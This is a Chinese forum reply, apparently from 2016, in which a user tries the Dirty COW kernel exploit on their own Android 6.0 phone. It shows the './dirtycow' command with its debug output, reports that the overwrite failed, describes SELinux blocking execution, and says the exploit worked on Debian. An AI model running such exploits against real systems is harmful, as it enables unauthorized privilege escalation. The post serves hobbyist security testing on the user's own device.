acess
2016-10-26 04:18:38 +08:00
在自己的手机(某国产骁龙 820 机器,原厂定制过的 Android 6.0 系统)上试了一下,好像不能利用?
shell@android:/xxx_path $ echo NORMALFILE > normal
shell@android:/xxx_path $ echo BADFILE > bad
shell@android:/xxx_path $ ./dirtycow normal bad
warning: new file size (8) and file old size (11) differ
size 11
[*] mmap 0xf7355000
[*] exploit (patch)
[*] currently 0xf7355000=4d524f4e
[*] madvise = 0xf7355000 11
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf7355000=4d524f4e
shell@android:/xxx_path $ cat normal
NORMALFILE
shell@android:/xxx_path $ cat bad
BADFILE
shell@android:/xxx_path $
文件内容没变啊😂不能利用?
用另一份 exploit 代码,等了快几分钟才跑完,好像也没效果。
另外这台机的 SELinux 似乎很变态啊, adb 里 /data/local/tmp 设置可执行权限无效, chmod 完 ls -l 一看还是没有 x ,不能执行;装了个终端模拟器,建了个目录,终于能执行了,不过不能打开 /system/bin/run-as 文件😂
而且,似乎不能执行 owner (或者是 group ?)和当前进程 UID 不符也是不能执行的(系统自带的文件应该就除外了)
Debian 上测试倒是可以利用。